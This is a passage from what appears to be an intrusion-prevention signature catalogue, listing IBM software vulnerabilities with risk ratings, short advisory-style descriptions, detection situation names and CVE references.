About this vulnerability: A vulnerability in IBM Lotus Domino
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Domino
Type: Malfunction
Description: There is a memory exception vulnerability in IBM Lotus Domino LDAP Server. The flaw is caused by improper validation of the user supplied data in an LDAP bind request. An attacker can exploit this vulnerability to terminate the target server which causes a denial of service condition.
Situation: LDAP_CS-IBM-Lotus-Domino-LDAP-Server-Memory-Exception
References:
CVE-2006-0580
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0580
BID-16523
http://www.securityfocus.com/bid/16523
Back to top

IBM-Lotus-Domino-Mailto-Buffer-Overflow

About this vulnerability: An IBM Lotus Domino Mailto Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Domino
Type: Buffer Overflow
Description: A buffer overflow vulnerability in the IBM Lotus Domino, versions 8.0.x before 8.0.2 FP5 and 8.5.x before 8.5.1 FP2, in the nrouter.exe service, which allows remote attackers to execute arbitrary code via a long e-mail address in an ORGANIZER:mailto header in an iCalendar calendar invitation.
Situation: SMTP_CS-IBM-Lotus-Domino-Mailto-Buffer-Overflow
References:
CVE-2010-3407
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3407
OSVDB-68040
http://www.osvdb.org/68040
Back to top

IBM-Lotus-Domino-Nrouter.exe-ICalendar-Mailto-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Lotus Domino
Risk: High
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Domino
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in IBM Lotus Domino Server. The vulnerability is due an error in processing e-mail messages containing iCalendar requests. A remote unauthenticated attacker could leverage this vulnerability by sending a malicious iCalendar e-mail message to a target server. Successful exploitation could lead to the execution of arbitrary code on a target server, within the security context of the affected service. In an unsuccessful attack, the target server could terminate abnormally.
Situation: E-Mail_BS-IBM-Lotus-Domino-Nrouter.exe-ICalendar-Mailto-Stack-Buffer-Overflow
File-TextId_IBM-Lotus-Domino-Nrouter.exe-ICalendar-Mailto-Stack-Buffer-Overflow
Back to top

IBM-Lotus-Domino-Web-Access-ActiveX-Control-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in IBM Lotus Domino Web Access
Risk: High
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Lotus Domino Web Access; Lotus Domino
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in IBM Lotus Domino Web Access ActiveX control. The flaw is due to improper bound protection in the InstallBrowserHelperDll() method when processing user-supplied arguments. A remote attacker may persuade the target user to open a malicious web page to inject and execute arbitrary code on the vulnerable system with the privileges of the currently logged on user.
Situation: HTTP_SS-IBM-Lotus-Domino-Web-Access-ActiveX-Control-Buffer-Overflow
File-Text_IBM-Lotus-Domino-Web-Access-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-4474
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4474
BID-26972
http://www.securityfocus.com/bid/26972
OSVDB-40954
http://www.osvdb.org/40954
Back to top

IBM-Lotus-Domino-Web-Server-URL-Accessing-Denial-of-Service

About this vulnerability: A vulnerability in IBM Lotus Domino Web Server
Risk: Low
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Lotus Domino Web Server
Type: Insecure Configuration
Description: There is a vulnerability in the Lotus Domino Web Server 6.0, 6.5.x before 6.5.6, and 7.0.x before 7.0.3 that allows remote attackers to cause a denial of service (daemon crash) via requests for URLs that reference certain files.
Situation: HTTP_CSU-IBM-Lotus-Domino-Web-Server-URL-Accessing-Denial-of-Service
References:
CVE-2007-0067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0067
BID-24307
http://www.securityfocus.com/bid/24307
OSVDB-35766
http://www.osvdb.org/35766
Back to top

IBM-Lotus-iNotes-Buffer-Overflow-Vulnerability

About this vulnerability: Buffer overlfow vulnerability in Lotus Notes
Risk: High
First detected in: sgpkg-ips-339-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Lotus Notes
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Lotus Notes iNotes server. The vulnerability is due to insufficient boundary checks when processing malformed HTTP requests. A remote unauthenticated attack can leverage this vulnerability by sending a crafted HTTP request to a target server. In an attack scenario where code execution is successful the injected code will be executed within the security context of the target service, which is usually SYSTEM.
Situation: HTTP_CRL-Lotus-Notes-iNotes-BOF
References:
CVE-2003-0178
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0178
BID-6871
http://www.securityfocus.com/bid/6871
OSVDB-10826
http://www.osvdb.org/10826
Back to top

IBM-Lotus-iNotes-Dwa85w.dll-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Lotus iNotes
Risk: Low
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Lotus iNotes
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in IBM Lotus iNotes. The vulnerability is due to a boundary error within the dwa85W.dll ActiveX control when setting the property Attachment_Times with an overly long string. A remote attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user's browser.
Situation: File-Text_IBM-Lotus-iNotes-Dwa85w.dll-ActiveX-Control-Buffer-Overflow
References:
CVE-2012-2175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2175
OSVDB-82755
http://www.osvdb.org/82755
Back to top

IBM-Lotus-Notes-1-2-3-Work-Sheet-File-Viewer-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in IBM Lotus Notes
Risk: High
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Lotus Notes
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in IBM Lotus Notes. The vulnerability is due to a boundary error in the Lotus 1-2-3 file viewer. A remote attacker could leverage this vulnerability by enticing a target user to view the maliciously crafted email attachment. Successful attack could allow for arbitrary code injection and execution with the privileges of the currently logged on user.
Situation: E-Mail_BS-IBM-Lotus-Notes-1-2-3-Work-Sheet-File-Viewer-Buffer-Overflow
File-Binary_IBM-Lotus-Notes-1-2-3-Work-Sheet-File-Viewer-Buffer-Overflow
Back to top

IBM-Lotus-Notes-Applix-Graphics-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Lotus Notes
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Notes
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in IBM Lotus Notes.
Situation: SMTP_CS-IBM-Lotus-Notes-Applix-Graphics-Parsing-Buffer-Overflow
File-TextId_IBM-Lotus-Notes-Applix-Graphics-Parsing-Buffer-Overflow
References:
CVE-2007-5405
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5405
BID-28454
http://www.securityfocus.com/bid/28454
Back to top

IBM-Lotus-Notes-Cross-Site-Scripting

About this vulnerability: A vulnerability in IBM Lotus Domino
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Domino; Lotus Notes
Type: Malfunction
Description: There is a security flaw in IBM Lotus Domino Web Access (DWA) and Lotus Notes. Embedded JavaScript in HTML formatted Emails will automatically be executed when opened. A attacker can leverage this vulnerability to execute scripts in Lotus Notes or in the DWA browser session. A successful exploitation through Lotus Mail will cause the malicious JavaScript embedded in the HTML formatted Email message to be executed. The behaviour of the target is dependent on the code in the malicious script. Note that the malicious script cannot access the local filesystem without explicit user confirmation. A successful attack exploiting Domino Web Access can inject malicious script code into the DWA session. An attacker can read or delete email, access the user's contact list and other operations on the user's mail account. The attacker can fully control the compromised mail account. The malicious script could also take actions on the user's computer in the security context of the DWA web site.
Situation: File-Text_IBM-Lotus-Notes-Cross-Site-Scripting
References:
CVE-2005-2175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2175
BID-14164
http://www.securityfocus.com/bid/14164
Back to top

IBM-Lotus-Notes-Doc-Attachment-Viewer-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Lotus Notes
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Notes
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in the way IBM Lotus Notes Attachment Viewer processes files. The vulnerability is a result of insufficient boundary checking while processing the Microsoft Word for DOS Document. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Word for DOS file, potentially causing arbitrary code to be injected and executed in the security context of the current user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, Lotus Notes will terminate.
Situation: File-Binary_IBM-Lotus-Notes-Doc-Attachment-Viewer-Buffer-Overflow
References:
CVE-2007-5544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5544
BID-26146
http://www.securityfocus.com/bid/26146
Back to top

IBM-Lotus-Notes-HTML-Message-Handling-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in IBM Lotus Notes
Risk: High
First detected in: sgpkg-ips-127-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Lotus Notes
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in IBM Lotus Notes. The vulnerability is a result of insufficient boundary checking while parsing HTML formatted e-mail. A remote attacker can exploit this vulnerability by persuading the target user to perform a certain operation on a crafted e-mail message, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: E-Mail_BS-IBM-Lotus-Notes-HTML-Message-Handling-Buffer-Overflow
File-Text_IBM-Lotus-Notes-HTML-Message-Handling-Buffer-Overflow
References:
CVE-2007-4222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4222
BID-26200
http://www.securityfocus.com/bid/26200
Back to top

IBM-Lotus-Notes-Lzh-Attachment-Viewer-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Lotus Notes
Risk: High
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Notes
Type: Buffer Overflow
Description: A code execution vulnerability exists in IBM Lotus Notes File Viewer. The vulnerability is due to a stack buffer overflow while parsing headers of LZH files. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted file to the target user and enticing to view it with the affected software. This could lead to code execution in the context of the affected application. In the event code execution is unsuccessful, it could lead to abnormal termination of the affected process, leading to a denial-of-service condition.
Situation: SMTP_IBM-Lotus-Notes-Lzh-Attachment-Viewer-Stack-Buffer-Overflow
File-Binary_Lotus-Notes-Lzh-Attachment-Viewer-Stack-Buffer-Overflow
References:
CVE-2011-1213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1213
BID-47962
http://www.securityfocus.com/bid/47962
Back to top

IBM-Lotus-Notes-MIF-Attachment-Viewer-Buffer-Overflow

About this vulnerability: A vulnerability in Lotus Notes
Risk: High
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Lotus Notes
Type: Buffer Overflow
Description: Multiple buffer overflow vulnerabilities exist in IBM Lotus Notes attachment viewer. The vulnerabilities are result of insufficient boundary checking while processing the Frame Maker Interchange File (MIF) files. A remote attacker can exploit these vulnerabilities by enticing the target user to open a crafted MIF email attachment, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: File-TextId_IBM-Lotus-Notes-MIF-Attachment-Viewer-Buffer-Overflow
References:
BID-26175
http://www.securityfocus.com/bid/26175
Back to top

IBM-Lotus-Notes-Url-Handler-Command-Execution

About this vulnerability: A vulnerability in IBM Lotus Notes
Risk: Moderate
First detected in: sgpkg-ips-471-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Notes
Type: Input Validation
Description: There is a command execution vulnerability in IBM Lotus Notes. The vulnerability is due to improper validation of notes: URIs. If the URI contains the string "-RPARAMS" subsequent substrings are interpreted as parameters of rcplauncher.exe allowing an attacker to execute a command by using the "-vm" parameter. Remote, unauthenticated attackers can exploit this vulnerability by enticing a user to click on a crafted "notes://" URI. Successful exploitation would result in execution of arbitrary commands in the context of the affected application.
Situation: File-Text_IBM-Lotus-Notes-Url-Handler-Command-Execution
References:
CVE-2012-2174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2174
BID-54070
http://www.securityfocus.com/bid/54070
OSVDB-83063
http://www.osvdb.org/83063
Back to top

IBM-Lotus-Notes-WPD-Attachment-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Lotus Notes
Risk: High
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Lotus Notes
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability exists in the IBM Lotus Notes WPD. The vulnerability is due to a boundary-check error when processing Corel WordPerfect (WPD) files. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted Corel WordPerfect file to the target users, potentially causing arbitrary code to be injected and executed on the target system in the security context of the current user. In an attack case where code injection is not successful, the instance of the vulnerable IBM Lotus Notes application will terminate abnormally. In a more sophisticated attack scenario where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.
Situation: File-Binary_IBM-Lotus-Notes-WPD-Attachment-Handling-Buffer-Overflow
References:
CVE-2008-4564
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4564
BID-34086
http://www.securityfocus.com/bid/34086
OSVDB-52713
http://www.osvdb.org/52713
Back to top

IBM-Lotus-Quickr-Qp2.cab-ActiveX-Control-Integer-Overflow

About this vulnerability: A vulnerability in IBM Lotus Quickr for Domino
Risk: Moderate
First detected in: sgpkg-ips-546-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Lotus Quickr
Type: Integer Overflow
Description: There is a buffer overflow vulnerability in IBM Lotus Quickr for Domino. The vulnerability is due to an integer overflow within the qp2.cab ActiveX control. A remote attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user's browser.
Situation: File-Text_Lotus-Quickr-Qp2.cab-ActiveX-Control-Integer-Overflow
References:
CVE-2013-3026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3026
OSVDB-94068
http://www.osvdb.org/94068
Back to top

IBM-Lotus-Quickr-Qp2.cab-ActiveX-Control-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Lotus Quickr
Risk: Moderate
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Lotus Quickr
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in IBM Lotus Quickr. The vulnerability is due to an unbounded string copy within the QuickPlace ActiveX control when setting either the Attachment_Times or Import_Times property. A remote attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user's browser.
Situation: File-Text_IBM-Lotus-Quickr-Qp2.cab-ActiveX-Control-Stack-Buffer-Overflow
References:
CVE-2012-2176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2176
BID-53678
http://www.securityfocus.com/bid/53678
Back to top

IBM-Lotus-Sametime-DoS

About this vulnerability: A IBM Lotus Sametime DoS vulnerability.
Risk: High
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Lotus Sametime
Type: Input Validation
Description: A vulnerability in IBM Lotus Sametime, versions 8.5.2 and 8.5.2.1, that allows remote attackers to cause a denial of service condition via a crafted audio visual session.
Situation: SIP-TCP_IBM-Lotus-Sametime-DoS
References:
CVE-2013-3986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3986
BID-63611
http://www.securityfocus.com/bid/63611
OSVDB-99552
http://www.osvdb.org/99552
Back to top

IBM-Lotus-Sametime-Information-Disclosure

About this vulnerability: A possible IBM Lotus Sametime Information Disclosure vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Lotus Sametime
Type: Insecure Configuration
Description: Traffic has been identified that could possibly be a vulnerability in IBM Lotus Sametime, versions 8.x through 8.5.2.1 and 9.x through 9.0.0.1, which allows remote attackers to obtain version, configuration, and possibly other sensitive information via a request to a public page.
Situation: HTTP_CSU-IBM-Lotus-Sametime-Information-Disclosure
References:
CVE-2013-3982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3982
Back to top

IBM-Lotus-Sametime-Room-Name-BruteForce

About this vulnerability: An IBM Lotus Sametime Room Name Bruteforce vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-762-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Lotus Sametime
Type: Brute Force
Description: A vulnerability in IBM Lotus Sametime, versions 8.x through 8.5.2.1 and 9.x through 9.0.0.1, which allows remote attackers to determin which meeting rooms are owned by a user.
Situation: HTTP_CSU-IBM-Lotus-Sametime-Room-Name-BruteForce
References:
CVE-2013-3977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3977
Back to top

IBM-Lotus-Sametime-User-Enumeration

About this vulnerability: An IBM Lotus Sametime User Enumeration vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-763-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Lotus Sametime
Type: Brute Force
Description: A vulnerability in IBM Lotus Sametime, versions 8.x through 8.5.2.1 and 9.x through 9.0.0.1, which allows remote attackers to discover user names, full names, and email addresses via a search.
Situation: HTTP_CSU-IBM-Lotus-Sametime-User-Enumeration
References:
CVE-2013-3975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3975
Back to top

IBM-Notes-PNG-Image-Parsing-Integer-Overflow

About this vulnerability: A vulnerability in IBM Lotus Notes
Risk: High
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-1841-5242
Platform: Generic
Software: Lotus Notes
Type: Integer Overflow
Description: A code execution vulnerability exists in IBM Notes (formerly Lotus Notes). The vulnerability is due to an integer overflow while parsing PNG images. A remote unauthenticated attacker can exploit this vulnerability by enticing the target user to view a malicious e-mail. Successful exploitation would allow the attacker to execute arbitrary code on the target system.
Situation: File-PNG_PNG-Image-With-Excessively-Large-Height-Or-Width-Value
References:
CVE-2013-2977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2977
BID-59693
http://www.securityfocus.com/bid/59693
OSVDB-93057
http://www.osvdb.org/93057
Back to top

IBM-OpenAdmin-Tool-Soap-welcomeServer-PHP-Code-Execution

About this vulnerability: An IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution vulnerability
Risk: High
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IBM OpenAdmin Tool
Type: Input Validation
Description: A vulnerability in IBM OpenAdmin Tool, versions 11.5, 11.7, and 12.1, which allows remote attackers to execute arbitrary code as system admin, due to the lack of input validation in the new_home_page parameter of the saveHomePage method.
Situation: HTTP_CRL-IBM-OpenAdmin-Tool-Soap-welcomeServer-PHP-Code-Execution
References:
CVE-2017-1092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1092
Back to top

IBM-Operational-Decision-Manager-Datasource-JNDI-Injection

About this vulnerability: An attempt to exploit a vulnerability in IBM Operational Decision Manager detected
Risk: High
First detected in: sgpkg-ips-1710-5242
Last changed: sgpkg-ips-1710-5242
Platform: Unix
Software: IBM Operational Decision Manager
Type: Input Validation
Description: A vulnerability in IBM Operational Decision Manager, versions 8.10.3, 8.10.4, 8.10.5.1, 8.11.0.1, 8.11.1, and 8.12.0.1, which allows remote attackers to execute arbitrary code by sending crafted requests to the target server, due to improper handling of user input in the datasource parameter.
Situation: HTTP_CS-IBM-Operational-Decision-Manager-Datasource-JNDI-Injection
References:
CVE-2024-22319
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22319
Back to top

IBM-Qradar-Siem-Authentication-Bypass

About this vulnerability: A vulnerability in IBM QRadar Security Information and Event Manager (SIEM)
Risk: Moderate
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM QRadar
Type: Malfunction
Description: Lack of authentication in a function causes an authentication bypass vulnerability in IBM QRadar. A successful exploit allows arbitrary code execution as the "nobody" user.
Situation: HTTP_CRL-IBM-Qradar-Siem-Authentication-Bypass
References:
CVE-2018-1418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1418
Back to top

IBM-Qradar-Siem-Remotejavascript-Insecure-Deserialization

About this vulnerability: A vulnerability in IBM QRadar Security Information and Event Manager (SIEM)
Risk: High
First detected in: sgpkg-ips-1303-5242
Last changed: sgpkg-ips-1303-5242
Platform: Generic
Software: IBM QRadar
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in IBM QRadar SIEM. This vulnerability is due to insufficient validation of requests sent to the RemoteJavaScript servlet. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to a vulnerable server. Successful exploitation can result in result in arbitrary code execution under the security context of the affected server.
Situation: HTTP_CRL-IBM-Qradar-Siem-Remotejavascript-Insecure-Deserialization
References:
CVE-2020-4280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4280
Back to top

IBM-Rational-Clearquest-Cqole-ActiveX-Code-Execution

About this vulnerability: A vulnerability in IBM Rational ClearQuest
Risk: Moderate
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IBM Rational ClearQuest
Type: Input Validation
Description: A security vulnerability has been reported in IBM's Rational ClearQuest CQOle ActiveX control. The vulnerability is due to a function prototype mismatch in an API call provided by the control. A remote, unauthenticated attacker could exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt may result in the execution of arbitrary code in the target user's security context.
Situation: File-Text_IBM-Rational-Clearquest-Cqole-ActiveX-Code-Execution
References:
CVE-2012-0708
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0708
OSVDB-81443
http://www.osvdb.org/81443
Back to top

IBM-Rational-Focal-Point-Login-Servlet-Information-Disclosure

About this vulnerability: A vulnerability in IBM Rational Focal Point
Risk: Moderate
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1345-5242
Platform: Generic
Software: IBM Focal Point
Type: Input Validation
Description: There is an information disclosure vulnerability in IBM Rational Focal Point. The vulnerability is due to an input validation error of the file variable in com.telelogic.focalpoint.pres.controller.LoginController servlet. A remote, unauthenticated attacker could exploit this vulnerability to read the configuration files of the Webservice Axis Gateway of Focal Point.
Situation: HTTP_CRL-IBM-Rational-Focal-Point-Login-Servlet-Information-Disclosure
References:
CVE-2013-5397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5397
BID-64338
http://www.securityfocus.com/bid/64338
OSVDB-101023
http://www.osvdb.org/101023
Back to top

IBM-Rational-Focal-Point-Requestaccesscontroller-Servlet-Information-Disclosure

About this vulnerability: A vulnerability in IBM Rational Focal Point
Risk: Moderate
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1345-5242
Platform: Generic
Software: IBM Focal Point
Type: Input Validation
Description: There is an information disclosure vulnerability in IBM Focal Point. The vulnerability is due to input validation error of file variable in com.telelogic.focalpoint.pres.controller.RequestAccessController servlet. A remote unauthenticated attacker could exploit this vulnerability to read the configuration files of the Webservice Axis Gateway of Focal Point.
Situation: HTTP_CSU-IBM-Rational-Focal-Point-Requestaccesscontroller-Servlet-Information-Disclosure
References:
CVE-2013-5398
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5398
BID-64339
http://www.securityfocus.com/bid/64339
OSVDB-101024
http://www.osvdb.org/101024
Back to top

IBM-Rational-Quality-Manager-And-Test-Lab-Manager-Policy-Bypass

About this vulnerability: A vulnerability in IBM Rational Quality Manager and Test Lab Manager
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: IBM Rational Quality Manager and Test Lab Manager
Type: Malfunction
Description: A policy bypass vulnerability exists in IBM Rational Quality Manager and Test Lab Manager.
Situation: HTTP_CSH-IBM-Rational-Quality-Manager-And-Test-Lab-Manager-Policy-Bypass
References:
BID-44172
http://www.securityfocus.com/bid/44172
Back to top

IBM-Rational-Rhapsody-Bb-Flashback-Fbrecorder-Multiple-Vulnerabilities

About this vulnerability: A vulnerability in Blueberry BB FlashBack SDK FBRecorder
Risk: Moderate
First detected in: sgpkg-ips-439-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Blueberry FlashBack SDK FBRecorder; IBM Rational Rhapsody
Type: Malfunction
Description: There are multiple vulnerabilities in the BB FlashBack FBRecorder ActiveX control, which is shipped as a component of IBM Rational Rhapsody. A remote, unauthenticated attacker could exploit these vulnerabilities by enticing a user to visit a malicious website leveraging an insecure method of the ActiveX control. Successful exploitation may result in execution of arbitrary code in the security context of the target user.
Situation: File-Text_IBM-Rational-Rhapsody-Bb-Flashback-Fbrecorder-Multiple-Vulnerabilities
References:
CVE-2011-1388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1388
BID-51184
http://www.securityfocus.com/bid/51184
OSVDB-77994
http://www.osvdb.org/77994
Back to top

IBM-solidDB-Denial-Of-Service

About this vulnerability: A vulnerability in IBM SolidDB allowing denial of service
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IBM SolidDB
Type: Malfunction
Description: A vulnerability exists in IBM SolidDB where an attacker could send a custom TCP packets causing a denial of service condition where the solid.exe daemon will crash. Fingerprint is for all three ag_soliddb_dos exploits.
Situation: Generic_CS-IBM-solidDB-Denial-Of-Service
Back to top

IBM-solidDB-Logging-Function-Format-String

About this vulnerability: Format string vulnerability in the IBM solidDB database server product
Risk: High
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: IBM SolidDB
Type: Format String
Description: There is a format string vulnerability in the IBM solidDB database server product. By sending a malicious message with a specially crafted Username or Host string field, a remote unauthenticated attacker can terminate the database server to cause a denial of service condition or to execute arbitrary code on the target host.
Situation: Generic_CS-IBM-solidDB-Logging-Function-Format-String
References:
CVE-2008-1705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1705
BID-28468
http://www.securityfocus.com/bid/28468
OSVDB-43778
http://www.osvdb.org/43778
Back to top

IBM-solidDB-Redundant-Where-Clause-Denial-Of-Service

About this vulnerability: An IBM solidDB Redundant Where Clause Denial Of Service vulnerability
Risk: High
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux; Solaris
Software: IBM SolidDB
Type: Malfunction
Description: A vulnerability in IBM solidDB which allows remote attackers to cause a denial of service condition by sending a crafted SQL command to the target server, due to a design weakness when handling a statement that contains a redundant WHERE clause.
Situation: Generic_CS-IBM-solidDB-Redundant-Where-Clause-Denial-Of-Service
References:
CVE-2012-0200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0200
Back to top

IBM-solidDB-Rownum-Subquery-Denial-Of-Service

About this vulnerability: A vulnerability in IBM SolidDB
Risk: Moderate
First detected in: sgpkg-ips-439-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM SolidDB
Type: Malfunction
Description: A denial of service vulnerability has been reported in IBM's solidDB. The vulnerability is due to a design weakness when handling a SELECT statement that contains a rownum condition with a subquery. A remote authenticated attacker could exploit this vulnerability by sending crafted SQL command to the target server. Successful exploitation may allow the attacker to crash the solid DB server resulting in a denial-of-service condition.
Situation: Generic_CS-IBM-solidDB-Rownum-Subquery-Denial-Of-Service
References:
BID-51629
http://www.securityfocus.com/bid/51629
Back to top

IBM-solidDB-Solid.exe-Authentication-Bypass

About this vulnerability: A vulnerability in IBM SolidDB
Risk: Moderate
First detected in: sgpkg-ips-388-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IBM SolidDB
Type: Malfunction
Description: An authentication bypass vulnerability exists in IBM's solidDB. The authentication protocol used by the product allows a remote attacker to specify the length of a password hash which can be abused to bypass authentication to the database. A remote unauthenticated attacker could exploit this vulnerability by specifying a small password hash length value and fuzzing the password hash. Successful exploitation may allow the attacker to bypass authentication to the database.
Situation: Generic_CS-IBM-solidDB-Solid.exe-Authentication-Bypass
References:
BID-47137
http://www.securityfocus.com/bid/47137
Back to top

IBM-Spectrum-Protect-Plus-Hfpackage-Command-Injection

About this vulnerability: A vulnerability in IBM Spectrum Protect Plus
Risk: Moderate
First detected in: sgpkg-ips-1272-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Spectrum Protect Plus
Type: Input Validation
Description: There exists a command injection vulnerability in IBM Spectrum Protect Plus. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-IBM-Spectrum-Protect-Plus-Hfpackage-Command-Injection
References:
CVE-2020-4212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4212
Back to top

IBM-Spectrum-Protect-Plus-Hostname-Command-Injection

About this vulnerability: A vulnerability in IBM Spectrum Protect Plus
Risk: High
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Spectrum Protect Plus
